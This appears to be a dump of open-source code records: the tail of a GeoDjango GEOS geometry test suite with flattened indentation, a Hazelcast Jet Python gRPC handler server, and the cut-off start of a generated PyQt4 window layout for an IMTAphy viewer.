self.assertEqual(g.json, geom.json)
self.assertEqual(g.json, geom.geojson)
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test01j_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
        # Error shouldn't be raised on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo' : 'bar'})
self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test02b_multipoints(self):
"Testing MultiPoint objects."
for mp in multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.points, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertEqual(p.empty, False)
self.assertEqual(p.valid, True)
def test03a_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for l in linestrings:
ls = fromstr(l.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertEqual(ls.ring, False)
if hasattr(l, 'centroid'):
self.assertEqual(l.centroid, ls.centroid.tuple)
if hasattr(l, 'tup'):
self.assertEqual(l.tup, ls.tuple)
self.assertEqual(True, ls == fromstr(l.wkt))
self.assertEqual(False, ls == prev)
self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
if HAS_NUMPY: self.assertEqual(ls, LineString(array(ls.tuple))) # as numpy array
def test03b_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for l in multilinestrings:
ml = fromstr(l.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
self.assertEqual(True, ml == fromstr(l.wkt))
self.assertEqual(False, ml == prev)
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test04_linearring(self):
"Testing LinearRing objects."
for rr in linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if HAS_NUMPY: self.assertEqual(lr, LinearRing(array(lr.tuple)))
def test05a_polygons(self):
"Testing Polygon objects."
prev = fromstr('POINT(0 0)')
for p in polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.empty, False)
self.assertEqual(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(True, poly == fromstr(p.wkt))
self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
self.assertEqual(True, poly != prev)
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
self.assertRaises(GEOSIndexError, poly.__getitem__, -1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
self.assertRaises(TypeError, Polygon.__init__, 'foo')
# Polygon(shell, (hole1, ... holeN))
rings = tuple(r for r in poly)
self.assertEqual(poly, Polygon(rings[0], rings[1:]))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test05b_multipolygons(self):
"Testing MultiPolygon objects."
print "\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n"
prev = fromstr('POINT (0 0)')
for mp in multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertEqual(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
print "\nEND - expecting GEOS_NOTICE; safe to ignore.\n"
def test06a_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
#### Memory issues with rings and polygons
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
s1, s2 = str(ring1), str(ring2)
# The previous hijinks tests are now moot because only clones are
# now used =)
def test08_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in xrange(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2: tset = (5, 23)
else: tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for i in xrange(len(relate_geoms)):
g_tup = relate_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
pat = g_tup[2]
result = g_tup[3]
self.assertEqual(result, a.relate_pattern(b, pat))
self.assertEqual(pat, a.relate(b))
def test10_intersection(self):
"Testing intersects() and intersection()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
i1 = fromstr(intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test11_union(self):
"Testing union()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
u1 = fromstr(union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test12_difference(self):
"Testing difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test13_symdifference(self):
"Testing sym_difference()."
for i in xrange(len(topology_geoms)):
g_tup = topology_geoms[i]
a = fromstr(g_tup[0].wkt)
b = fromstr(g_tup[1].wkt)
d1 = fromstr(sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test14_buffer(self):
"Testing buffer()."
for i in xrange(len(buffer_geoms)):
g_tup = buffer_geoms[i]
g = fromstr(g_tup[0].wkt)
# The buffer we expect
exp_buf = fromstr(g_tup[1].wkt)
# Can't use a floating-point for the number of quadsegs.
self.assertRaises(ArgumentError, g.buffer, g_tup[2], float(g_tup[3]))
# Constructing our buffer
buf = g.buffer(g_tup[2], g_tup[3])
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in xrange(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in xrange(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
self.assertRaises(ArgumentError, pnt.set_srid, '4326')
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly: self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
# In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
# the SRID information is lost and set to -1 -- this is not a
# problem on the 3.0.0 version (another reason to upgrade).
exp_srid = self.null_srid
p2 = fromstr(p1.hex)
self.assertEqual(exp_srid, p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
### Testing the mutability of Polygons ###
for p in polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
s = str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
### Testing the mutability of Geometry Collections
for tg in multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(1, 100), random.randint(1, 100))
# Testing the assignment
mp[i] = new
s = str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in multipolygons:
mpoly = fromstr(tg.wkt)
for i in xrange(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
                # Offsetting each ring in the polygon by 500.
for j in xrange(len(poly)):
r = poly[j]
for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
s = str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
#mpoly[0][0][0] = (3.14, 2.71)
#self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
#self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
#del mpoly
def test17_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2.,3.,8.), pnt.coords)
self.assertRaises(TypeError, pnt.set_coords, (1.,2.))
pnt.coords = (1.,2.,3.)
self.assertEqual((1.,2.,3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2.,3.,8.), (50.,250.,-117.)), ls.tuple)
self.assertRaises(TypeError, ls.__setitem__, 0, (1.,2.))
ls[0] = (1.,2.,3.)
self.assertEqual((1.,2.,3.), ls[0])
def test18_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test19_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
        # Should be circumference of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test20_emptyCollections(self):
"Testing empty geometries and collections."
gc1 = GeometryCollection([])
gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
pnt = fromstr('POINT EMPTY')
ls = fromstr('LINESTRING EMPTY')
poly = fromstr('POLYGON EMPTY')
mls = fromstr('MULTILINESTRING EMPTY')
mpoly1 = fromstr('MULTIPOLYGON EMPTY')
mpoly2 = MultiPolygon(())
for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
self.assertEqual(True, g.empty)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
self.assertRaises(GEOSIndexError, g.get_x)
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertEqual(True, lr.empty)
self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
else:
self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test21_test_gdal(self):
"Testing `ogr` and `srs` properties."
if not HAS_GDAL: return
g1 = fromstr('POINT(5 23)')
self.assertEqual(True, isinstance(g1.ogr, OGRGeometry))
self.assertEqual(g1.srs, None)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertEqual(True, isinstance(g2.ogr, OGRGeometry))
self.assertEqual(True, isinstance(g2.srs, SpatialReference))
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test22_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test23_transform(self):
"Testing `transform` method."
if not HAS_GDAL: return
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(SpatialReference('EPSG:2774'))
ct = CoordTransform(SpatialReference('WGS84'), SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test24_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test25_pickle(self):
"Testing pickling and unpickling support."
# Using both pickle and cPickle -- just 'cause.
import pickle, cPickle
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(points)
tgeoms.extend(get_geoms(multilinestrings, 4326))
tgeoms.extend(get_geoms(polygons, 3084))
tgeoms.extend(get_geoms(multipolygons, 900913))
# The SRID won't be exported in GEOS 3.0 release candidates.
no_srid = self.null_srid == -1
for geom in tgeoms:
s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
g1, g2 = cPickle.loads(s1), pickle.loads(s2)
for tmpg in (g1, g2):
self.assertEqual(geom, tmpg)
if not no_srid: self.assertEqual(geom.srid, tmpg.srid)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GEOSTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| apache-2.0 | 493,359,934,862,514,500 | 39.643871 | 121 | 0.561224 | false |
hazelcast/hazelcast | extensions/python/src/main/resources/jet_to_python_grpc_server.py | 10 | 3200 | import grpc
import sys
import os
import socket
import logging
import importlib
from concurrent import futures
import jet_to_python_pb2
import jet_to_python_pb2_grpc
logger = logging.getLogger('Python PID %d' % os.getpid())
class JetToPythonServicer(jet_to_python_pb2_grpc.JetToPythonServicer):
def __init__(self, handler_function):
self._handler_function = handler_function
def streamingCall(self, request_iterator, context):
for request in request_iterator:
output_list = self._handler_function(request.inputValue)
output_item = jet_to_python_pb2.OutputMessage(outputValue = output_list)
yield output_item
logger.info('gRPC call completed')
def load_handler_function(handler_module_name, handler_function_name):
try:
handler_module = importlib.import_module(handler_module_name)
except ImportError as e:
raise RuntimeError("Cannot import module %s" % (handler_module_name), e)
if not hasattr(handler_module, handler_function_name):
raise RuntimeError("Handler function %s.%s doesn't exist" % (handler_module_name, handler_function_name))
return getattr(handler_module, handler_function_name)
def serve(phoneback_port, handler_module_name, handler_function_name):
# Fail as soon as possible for any simple problem with passed-in arguments
phoneback_port_int = int(phoneback_port)
handler_function = load_handler_function(handler_module_name, handler_function_name)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1), options=[
('grpc.max_send_message_length', 100 * 1024 * 1024),
('grpc.max_receive_message_length', 100 * 1024 * 1024),
('grpc.so_reuseport', 0)
])
jet_to_python_pb2_grpc.add_JetToPythonServicer_to_server(
JetToPythonServicer(handler_function),
server
)
listen_port = server.add_insecure_port('localhost:0')
if listen_port == 0:
logger.error("Couldn't find a port to bind to")
return
phoneback_message = ('%d\n' % listen_port).encode('utf-8')
server.start()
logger.info('started listening on port %d', listen_port)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('localhost', phoneback_port_int))
s.sendall(phoneback_message)
# Wait for a stop signal in stdin
stdin_message = input()
if stdin_message == 'stop':
logger.info('Received a "stop" message from stdin. Stopping the server.')
else:
logger.info('Received an unexpected message from stdin: "%s"' % stdin_message)
server.stop(0).wait()
if __name__ == '__main__':
logging.basicConfig(stream=sys.stdout, format='%(asctime)s %(levelname)s [%(name)s] %(threadName)s - %(message)s', level=logging.INFO)
# Expecting these command-line parameters:
# - $1 is the port where Jet is listening for the Python process to
# 'phone back' and tell Jet on which port it started its gRPC endpoint.
# - $2.$3 is the module.function of the handler function that will handle
# the input from Jet.
serve(phoneback_port=sys.argv[1], handler_module_name=sys.argv[2], handler_function_name=sys.argv[3])
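# Illustrative handler module (hypothetical, not part of this file): the
# ``<module>.<function>`` passed on the command line receives the batch of
# input values from one request and must return the list of output values,
# e.g. an ``echo.py`` containing
#
#     def transform_list(input_list):
#         return ['echo-%s' % item for item in input_list]
#
# started as: python jet_to_python_grpc_server.py <phoneback_port> echo transform_list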
| apache-2.0 | 4,658,484,364,949,678,000 | 40.558442 | 138 | 0.68875 | false |
creasyw/IMTAphy | modules/phy/imtaphy/testConfigs/imtaphyViewer/ui/Windows_Main_ui.py | 1 | 9101 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Windows_Main.ui'
#
# Created: Tue Jan 24 03:15:16 2012
# by: PyQt4 UI code generator 4.8.5
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Windows_Main(object):
def setupUi(self, Windows_Main):
Windows_Main.setObjectName(_fromUtf8("Windows_Main"))
Windows_Main.resize(752, 550)
Windows_Main.setWindowTitle(QtGui.QApplication.translate("Windows_Main", "IMTAphyViewer 0.1", None, QtGui.QApplication.UnicodeUTF8))
self.centralwidget = QtGui.QWidget(Windows_Main)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.vboxlayout = QtGui.QVBoxLayout(self.centralwidget)
self.vboxlayout.setSpacing(6)
self.vboxlayout.setMargin(9)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
Windows_Main.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(Windows_Main)
self.menubar.setGeometry(QtCore.QRect(0, 0, 752, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setTitle(QtGui.QApplication.translate("Windows_Main", "&File", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setObjectName(_fromUtf8("menuFile"))
Windows_Main.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(Windows_Main)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.statusbar.sizePolicy().hasHeightForWidth())
self.statusbar.setSizePolicy(sizePolicy)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
Windows_Main.setStatusBar(self.statusbar)
self.actionQuit = QtGui.QAction(Windows_Main)
self.actionQuit.setText(QtGui.QApplication.translate("Windows_Main", "&Quit", None, QtGui.QApplication.UnicodeUTF8))
self.actionQuit.setShortcut(QtGui.QApplication.translate("Windows_Main", "Ctrl+Q", None, QtGui.QApplication.UnicodeUTF8))
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.actionAboutQt = QtGui.QAction(Windows_Main)
self.actionAboutQt.setText(QtGui.QApplication.translate("Windows_Main", "About Qt", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutQt.setObjectName(_fromUtf8("actionAboutQt"))
self.actionAboutWrowser = QtGui.QAction(Windows_Main)
self.actionAboutWrowser.setText(QtGui.QApplication.translate("Windows_Main", "About Wrowser", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutWrowser.setObjectName(_fromUtf8("actionAboutWrowser"))
self.actionOpenDatabase = QtGui.QAction(Windows_Main)
self.actionOpenDatabase.setText(QtGui.QApplication.translate("Windows_Main", "Open S&QLObject Database", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDatabase.setObjectName(_fromUtf8("actionOpenDatabase"))
self.actionOpenDSV = QtGui.QAction(Windows_Main)
self.actionOpenDSV.setText(QtGui.QApplication.translate("Windows_Main", "Open DS&V", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDSV.setIconText(QtGui.QApplication.translate("Windows_Main", "Open DSV", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDSV.setObjectName(_fromUtf8("actionOpenDSV"))
self.actionOpenPythonCampaign = QtGui.QAction(Windows_Main)
self.actionOpenPythonCampaign.setText(QtGui.QApplication.translate("Windows_Main", "Open &Python Campaign", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenPythonCampaign.setObjectName(_fromUtf8("actionOpenPythonCampaign"))
self.actionOpenDirectory = QtGui.QAction(Windows_Main)
self.actionOpenDirectory.setText(QtGui.QApplication.translate("Windows_Main", "Open &Directory", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenDirectory.setObjectName(_fromUtf8("actionOpenDirectory"))
self.actionCloseFigure = QtGui.QAction(Windows_Main)
self.actionCloseFigure.setText(QtGui.QApplication.translate("Windows_Main", "&Close", None, QtGui.QApplication.UnicodeUTF8))
